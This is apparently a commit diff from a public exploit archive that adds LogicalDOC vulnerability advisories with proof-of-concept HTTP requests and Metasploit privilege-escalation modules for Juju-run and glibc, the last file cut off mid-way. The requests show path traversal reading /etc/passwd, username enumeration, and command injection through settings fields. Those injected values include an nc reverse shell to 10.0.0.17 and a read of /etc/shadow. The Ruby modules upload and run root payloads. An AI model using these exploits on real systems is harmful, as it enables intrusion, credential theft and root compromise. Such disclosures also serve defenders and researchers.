DB: 2018-02-13
7 changes to exploits/shellcodes Juju-run Agent - Privilege Escalation (Metasploit) glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit) glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit) LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure LogicalDOC Enterprise 7.7.4 - Directory Traversal LogicalDOC Enterprise 7.7.4 - User Enumeration LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution
This commit is contained in:
parent
afff66a166
commit
7b401481a2
8 changed files with 1316 additions and 0 deletions
111
exploits/java/webapps/44019.txt
Normal file
111
exploits/java/webapps/44019.txt
Normal file
|
@ -0,0 +1,111 @@
|
|||
LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities
|
||||
|
||||
|
||||
Vendor: LogicalDOC Srl
|
||||
Product web page: https://www.logicaldoc.com
|
||||
Affected version: 7.7.4
|
||||
7.7.3
|
||||
7.7.2
|
||||
7.7.1
|
||||
7.6.4
|
||||
7.6.2
|
||||
7.5.1
|
||||
7.4.2
|
||||
7.1.1
|
||||
|
||||
Summary: LogicalDOC is a free document management system that is designed
|
||||
to handle and share documents within an organization. LogicalDOC is a content
|
||||
repository, with Lucene indexing, Activiti workflow, and a set of automatic
|
||||
import procedures.
|
||||
|
||||
Desc: The application suffers from multiple post-auth file disclosure vulnerability
|
||||
when input passed thru the 'suffix' and 'fileVersion' parameters is not properly
|
||||
verified before being used to include files. This can be exploited to read arbitrary
|
||||
files from local resources with directory traversal attacks.
|
||||
|
||||
Tested on: Microsoft Windows 10
|
||||
Linux Ubuntu 16.04
|
||||
Java 1.8.0_161
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/8.5.24
|
||||
Apache Tomcat/8.5.13
|
||||
Undisclosed 8.41
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2018-5450
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php
|
||||
|
||||
|
||||
26.01.2018
|
||||
|
||||
---
|
||||
|
||||
|
||||
PoC #1:
|
||||
|
||||
GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
|
||||
Host: localhost:8080
|
||||
|
||||
|
||||
Response:
|
||||
|
||||
; for 16-bit app support
|
||||
[fonts]
|
||||
[extensions]
|
||||
[mci extensions]
|
||||
[files]
|
||||
[Mail]
|
||||
MAPI=1
|
||||
[MCI Extensions.BAK]
|
||||
3g2=MPEGVideo
|
||||
3gp=MPEGVideo
|
||||
3gp2=MPEGVideo
|
||||
3gpp=MPEGVideo
|
||||
aac=MPEGVideo
|
||||
adt=MPEGVideo
|
||||
adts=MPEGVideo
|
||||
m2t=MPEGVideo
|
||||
m2ts=MPEGVideo
|
||||
m2v=MPEGVideo
|
||||
m4a=MPEGVideo
|
||||
m4v=MPEGVideo
|
||||
mod=MPEGVideo
|
||||
mov=MPEGVideo
|
||||
mp4=MPEGVideo
|
||||
mp4v=MPEGVideo
|
||||
mts=MPEGVideo
|
||||
ts=MPEGVideo
|
||||
tts=MPEGVideo
|
||||
|
||||
|
||||
|
||||
PoC #2:
|
||||
|
||||
GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1
|
||||
Host: localhozt:8080
|
||||
|
||||
|
||||
Response:
|
||||
|
||||
HTTP/1.1 200
|
||||
Cache-Control: must-revalidate, post-check=0,pre-check=0
|
||||
Expires: 0
|
||||
Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?="
|
||||
Pragma: public
|
||||
Content-Type: application/pdf;charset=UTF-8
|
||||
Content-Length: 964
|
||||
Date: Mon, 05 Feb 2018 21:30:59 GMT
|
||||
Connection: close
|
||||
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
||||
bin:x:2:2:bin:/bin:/bin/sh
|
||||
sys:x:3:3:sys:/dev:/bin/sh
|
||||
sync:x:4:100:sync:/bin:/bin/sync
|
||||
games:x:5:100:games:/usr/games:/bin/sh
|
||||
...
|
||||
...
|
86
exploits/java/webapps/44020.txt
Normal file
86
exploits/java/webapps/44020.txt
Normal file
|
@ -0,0 +1,86 @@
|
|||
LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness
|
||||
|
||||
|
||||
Vendor: LogicalDOC Srl
|
||||
Product web page: https://www.logicaldoc.com
|
||||
Affected version: 7.7.4
|
||||
7.7.3
|
||||
7.7.2
|
||||
7.7.1
|
||||
7.6.4
|
||||
7.6.2
|
||||
7.5.1
|
||||
7.4.2
|
||||
7.1.1
|
||||
|
||||
Summary: LogicalDOC is a free document management system that is designed
|
||||
to handle and share documents within an organization. LogicalDOC is a content
|
||||
repository, with Lucene indexing, Activiti workflow, and a set of automatic
|
||||
import procedures.
|
||||
|
||||
Desc: The weakness is caused due to the 'j_spring_security_check' script
|
||||
and how it verifies provided credentials. Attacker can use this weakness
|
||||
to enumerate valid users on the affected node.
|
||||
|
||||
Tested on: Microsoft Windows 10
|
||||
Linux Ubuntu 16.04
|
||||
Java 1.8.0_161
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/8.5.24
|
||||
Apache Tomcat/8.5.13
|
||||
Undisclosed 8.41
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2018-5451
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php
|
||||
|
||||
|
||||
26.01.2018
|
||||
|
||||
--
|
||||
|
||||
|
||||
Request/response for existent username:
|
||||
---------------------------------------
|
||||
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: 192.168.1.74:8080
|
||||
|
||||
j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
|
||||
|
||||
--
|
||||
|
||||
HTTP/1.1 302
|
||||
Set-Cookie: ldoc-failure=wrongpassword
|
||||
Location: //login.jsp?failure=wrongpassword
|
||||
Content-Length: 0
|
||||
Date: Tue, 06 Feb 2084 19:42:15 GMT
|
||||
Connection: close
|
||||
|
||||
|
||||
Request/response for non-existent username:
|
||||
-------------------------------------------
|
||||
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: 192.168.1.74:8080
|
||||
|
||||
j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
|
||||
|
||||
--
|
||||
|
||||
HTTP/1.1 500
|
||||
Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
|
||||
Content-Type: text/html;charset=UTF-8
|
||||
Content-Length: 78
|
||||
Date: Tue, 06 Feb 2084 19:57:14 GMT
|
||||
Connection: close
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<div><br/><br/><strong>ERROR</strong></div>
|
||||
</body>
|
||||
<html>
|
103
exploits/java/webapps/44021.txt
Normal file
103
exploits/java/webapps/44021.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation
|
||||
|
||||
|
||||
Vendor: LogicalDOC Srl
|
||||
Product web page: https://www.logicaldoc.com
|
||||
Affected version: 7.7.4
|
||||
7.7.3
|
||||
7.7.2
|
||||
7.7.1
|
||||
7.6.4
|
||||
7.6.2
|
||||
7.5.1
|
||||
7.4.2
|
||||
7.1.1
|
||||
|
||||
Summary: LogicalDOC is a free document management system that is designed
|
||||
to handle and share documents within an organization. LogicalDOC is a content
|
||||
repository, with Lucene indexing, Activiti workflow, and a set of automatic
|
||||
import procedures.
|
||||
|
||||
Desc: LogicalDOC suffers from multiple authenticated OS command execution
|
||||
vulnerabilities by manipulating the path of the many binaries included in the
|
||||
package when changing the settings with their respected arguments. This can be
|
||||
exploited to execute local root privilege escalation attack and/or inject and
|
||||
execute arbitrary system commands as the root or SYSTEM user depending on the
|
||||
platform affected.
|
||||
|
||||
Tested on: Microsoft Windows 10
|
||||
Linux Ubuntu 16.04
|
||||
Java 1.8.0_161
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/8.5.24
|
||||
Apache Tomcat/8.5.13
|
||||
Undisclosed 8.41
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2018-5452
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php
|
||||
|
||||
|
||||
26.01.2018
|
||||
|
||||
|
||||
|
||||
|
||||
After saving the settings, the command will be executed whenever a user uploads a file
|
||||
that was inserted in the 'default.antivirus.includes' list. PoC for antivirus.command:
|
||||
--------------------------------------------------------------------------------------
|
||||
|
||||
POST /frontend/setting HTTP/1.1
|
||||
Host: localhost:8080
|
||||
Connection: keep-alive
|
||||
Content-Length: 594
|
||||
X-GWT-Module-Base: http://localhost:8080/frontend/
|
||||
X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8
|
||||
Origin: http://localhost:8080
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67
|
||||
Content-Type: text/x-gwt-rpc; charset=UTF-8
|
||||
Accept: */*
|
||||
Referer: http://localhost:8080/frontend.jsp?docId=3735554
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7
|
||||
|
||||
|
||||
7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|
|
||||
|
||||
|
||||
|
||||
PoC for call home reverse shell via ocr.Tesseract.path:
|
||||
-------------------------------------------------------
|
||||
|
||||
POST /frontend/setting HTTP/1.1
|
||||
Host: localhost:8080
|
||||
|
||||
|
||||
7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25|
|
||||
|
||||
|
||||
|
||||
PoC for Key Store via OpenSSL path:
|
||||
-----------------------------------
|
||||
|
||||
POST /frontend/sign HTTP/1.1
|
||||
Host: localhost:8080
|
||||
|
||||
|
||||
7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2|
|
||||
|
||||
|
||||
|
||||
PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool:
|
||||
-----------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /frontend/setting HTTP/1.1
|
||||
Host: localhost:8080
|
||||
|
||||
|
||||
7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35|
|
132
exploits/linux/local/44023.rb
Executable file
132
exploits/linux/local/44023.rb
Executable file
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Juju-run Agent Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to gain root privileges on Juju agent systems
|
||||
running the juju-run agent utility.
|
||||
|
||||
Juju agent systems running agent tools prior to version 1.25.12,
|
||||
2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket
|
||||
to manage software ("units") without setting appropriate permissions,
|
||||
allowing unprivileged local users to execute arbitrary commands as root.
|
||||
|
||||
This module has been tested successfully with Juju agent tools versions
|
||||
1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju
|
||||
1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ryan Beisner', # Discovery and PoC
|
||||
'David Ames (@thedac)', # Discovery and PoC
|
||||
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => 'Apr 13 2017',
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Targets' => [[ 'Auto', {} ]],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-9232' ],
|
||||
[ 'BID', '98737' ],
|
||||
[ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
juju_run_path = cmd_exec 'which juju-run'
|
||||
|
||||
if juju_run_path.start_with? '/'
|
||||
vprint_good 'juju-run is installed'
|
||||
return CheckCode::Detected
|
||||
end
|
||||
|
||||
vprint_error 'juju-run is NOT installed'
|
||||
|
||||
CheckCode::Safe
|
||||
end
|
||||
|
||||
def unit_names
|
||||
units = []
|
||||
|
||||
cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log|
|
||||
units << ::File.basename(log).gsub(/\.log$/, '')
|
||||
end
|
||||
|
||||
cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent|
|
||||
units << ::File.basename(agent)
|
||||
end
|
||||
|
||||
units.uniq
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
cmd_exec "juju-run #{opts['unit']} '#{cmd}'"
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
cmd_exec "chmod +x '#{path}'"
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def exploit
|
||||
if check != CheckCode::Detected
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ]
|
||||
|
||||
if units.empty?
|
||||
fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'"
|
||||
end
|
||||
|
||||
# Check each unit for a privileged socket
|
||||
print_status "Trying #{units.size} units..."
|
||||
|
||||
socket_unit = nil
|
||||
unit_names.each do |unit|
|
||||
id = execute_command 'id', 'unit' => unit
|
||||
|
||||
if id.include? 'root'
|
||||
print_good "Unit #{unit.inspect} uses a privileged socket"
|
||||
socket_unit = unit
|
||||
break
|
||||
end
|
||||
end
|
||||
|
||||
if socket_unit.nil?
|
||||
fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket'
|
||||
end
|
||||
|
||||
# Upload payload executable
|
||||
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
payload_path = "#{datastore['WritableDir']}/#{payload_name}"
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
|
||||
# Execute payload executable
|
||||
vprint_status 'Executing payload...'
|
||||
execute_command payload_path, 'unit' => socket_unit
|
||||
end
|
||||
end
|
232
exploits/linux/local/44024.rb
Executable file
232
exploits/linux/local/44024.rb
Executable file
|
@ -0,0 +1,232 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/local/linux'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Local::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation",
|
||||
'Description' => %q{
|
||||
This module attempts to gain root privileges on Linux systems by abusing
|
||||
a vulnerability in the GNU C Library (glibc) dynamic linker.
|
||||
|
||||
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
|
||||
properly restrict use of the LD_AUDIT environment variable when loading
|
||||
setuid executables which allows control over the $ORIGIN library search
|
||||
path resulting in execution of arbitrary shared objects.
|
||||
|
||||
This module opens a file descriptor to the specified suid executable via
|
||||
a hard link, then replaces the hard link with a shared object before
|
||||
instructing the linker to execute the file descriptor, resulting in
|
||||
arbitrary code execution.
|
||||
|
||||
The specified setuid binary must be readable and located on the same
|
||||
file system partition as the specified writable directory.
|
||||
|
||||
This module has been tested successfully on glibc version 2.5 on CentOS
|
||||
5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386).
|
||||
|
||||
RHEL 5 is reportedly affected, but untested. Some versions of ld.so,
|
||||
such as the version shipped with Ubuntu 14, hit a failed assertion
|
||||
in dl_open_worker causing exploitation to fail.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Discovery and exploit
|
||||
'Brendan Coles' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => 'Oct 18 2010',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
|
||||
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3847' ],
|
||||
[ 'BID', '44154' ],
|
||||
[ 'EDB', '15274' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ],
|
||||
[ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
|
||||
[ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
|
||||
[ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir']
|
||||
end
|
||||
|
||||
def suid_exe_path
|
||||
datastore['SUID_EXECUTABLE']
|
||||
end
|
||||
|
||||
def check
|
||||
glibc_banner = cmd_exec 'ldd --version'
|
||||
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
|
||||
if glibc_version.eql? ''
|
||||
vprint_error 'Could not determine the GNU C library version'
|
||||
return CheckCode::Safe
|
||||
elsif glibc_version >= Gem::Version.new('2.12.2') ||
|
||||
(glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
|
||||
vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "GNU C Library version #{glibc_version} is vulnerable"
|
||||
|
||||
unless setuid? suid_exe_path
|
||||
vprint_error "#{suid_exe_path} is not setuid"
|
||||
return CheckCode::Detected
|
||||
end
|
||||
vprint_good "#{suid_exe_path} is setuid"
|
||||
|
||||
unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 'true'
|
||||
vprint_error("#{suid_exe_path} is not readable")
|
||||
return CheckCode::Detected
|
||||
end
|
||||
vprint_good "#{suid_exe_path} is readable"
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
cmd_exec "chmod +x '#{path}'"
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def exploit
|
||||
check_status = check
|
||||
|
||||
if check_status == CheckCode::Appears
|
||||
print_good 'The target appears to be vulnerable'
|
||||
elsif check_status == CheckCode::Detected
|
||||
fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable"
|
||||
else
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
|
||||
base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
|
||||
if suid_partition == base_partition
|
||||
vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition"
|
||||
else
|
||||
print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
|
||||
end
|
||||
|
||||
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
payload_path = "#{base_dir}/#{payload_name}"
|
||||
|
||||
# Set target
|
||||
uname = cmd_exec 'uname -m'
|
||||
vprint_status "System architecture is #{uname}"
|
||||
if target.name.eql? 'Automatic'
|
||||
case uname
|
||||
when 'x86_64'
|
||||
my_target = targets[2]
|
||||
when /x86/, /i\d86/
|
||||
my_target = targets[1]
|
||||
else
|
||||
fail_with Failure::NoTarget, 'Unable to automatically select a target'
|
||||
end
|
||||
else
|
||||
my_target = target
|
||||
end
|
||||
print_status "Using target: #{my_target.name}"
|
||||
|
||||
cpu = nil
|
||||
case my_target['Arch']
|
||||
when ARCH_X86
|
||||
cpu = Metasm::Ia32.new
|
||||
when ARCH_X64
|
||||
cpu = Metasm::X86_64.new
|
||||
else
|
||||
fail_with Failure::NoTarget, 'Target is not compatible'
|
||||
end
|
||||
|
||||
# Compile shared object
|
||||
so_stub = %|
|
||||
extern int setuid(int);
|
||||
extern int setgid(int);
|
||||
extern int system(const char *__s);
|
||||
|
||||
void init(void) __attribute__((constructor));
|
||||
|
||||
void __attribute__((constructor)) init() {
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
system("#{payload_path}");
|
||||
}
|
||||
|
|
||||
|
||||
begin
|
||||
so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
|
||||
rescue
|
||||
print_error "Metasm encoding failed: #{$ERROR_INFO}"
|
||||
elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
|
||||
elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
|
||||
fail_with Failure::Unknown, 'Metasm encoding failed'
|
||||
end
|
||||
|
||||
# Upload shared object
|
||||
so_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
so_path = "#{base_dir}/#{so_name}"
|
||||
upload_and_chmodx so_path, so
|
||||
|
||||
# Upload exploit
|
||||
link_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
link_path = "#{base_dir}/#{link_name}"
|
||||
fd = rand(10..200)
|
||||
exp = %(
|
||||
rm -rf '#{link_path}'
|
||||
mkdir '#{link_path}'
|
||||
ln #{suid_exe_path} #{link_path}/#{link_name}
|
||||
exec #{fd}< #{link_path}/#{link_name}
|
||||
ls -l /proc/$$/fd/#{fd}
|
||||
rm -rf '#{link_path}'
|
||||
ls -l /proc/$$/fd/#{fd}
|
||||
mv #{so_path} #{link_path}
|
||||
LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
|
||||
)
|
||||
|
||||
exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
exp_path = "#{base_dir}/#{exp_name}"
|
||||
upload_and_chmodx exp_path, exp
|
||||
register_file_for_cleanup link_path
|
||||
|
||||
# Upload payload
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
|
||||
# Launch exploit
|
||||
print_status 'Launching exploit...'
|
||||
# The echo at the end of the command is required
|
||||
# else the original session may die
|
||||
output = cmd_exec "#{exp_path}& echo "
|
||||
output.each_line { |line| vprint_status line.chomp }
|
||||
end
|
||||
end
|
249
exploits/linux/local/44025.rb
Executable file
249
exploits/linux/local/44025.rb
Executable file
|
@ -0,0 +1,249 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/local/linux'
|
||||
require 'msf/core/exploit/exe'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Local::Linux
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to gain root privileges on Linux systems by abusing
|
||||
a vulnerability in the GNU C Library (glibc) dynamic linker.
|
||||
|
||||
glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not
|
||||
properly restrict use of the LD_AUDIT environment variable when loading
|
||||
setuid executables. This allows loading arbitrary shared objects from
|
||||
the trusted library search path with the privileges of the suid user.
|
||||
|
||||
This module uses LD_AUDIT to load the libpcprofile.so shared object,
|
||||
distributed with some versions of glibc, and leverages arbitrary file
|
||||
creation functionality in the library constructor to write a root-owned
|
||||
world-writable file to a system trusted search path (usually /lib).
|
||||
The file is then overwritten with a shared object then loaded with
|
||||
LD_AUDIT resulting in arbitrary code execution.
|
||||
|
||||
This module has been tested successfully on glibc version 2.11.1 on
|
||||
Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386.
|
||||
|
||||
RHEL 5 is reportedly affected, but untested. Some glibc distributions
|
||||
do not contain the libpcprofile.so library required for successful
|
||||
exploitation.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Discovery and exploit
|
||||
'zx2c4', # "I Can't Read and I Won't Race You Either" exploit
|
||||
'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits
|
||||
'Todor Donev', # libmemusage.so exploit
|
||||
'Brendan Coles' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => 'Oct 18 2010',
|
||||
'Platform' => 'linux',
|
||||
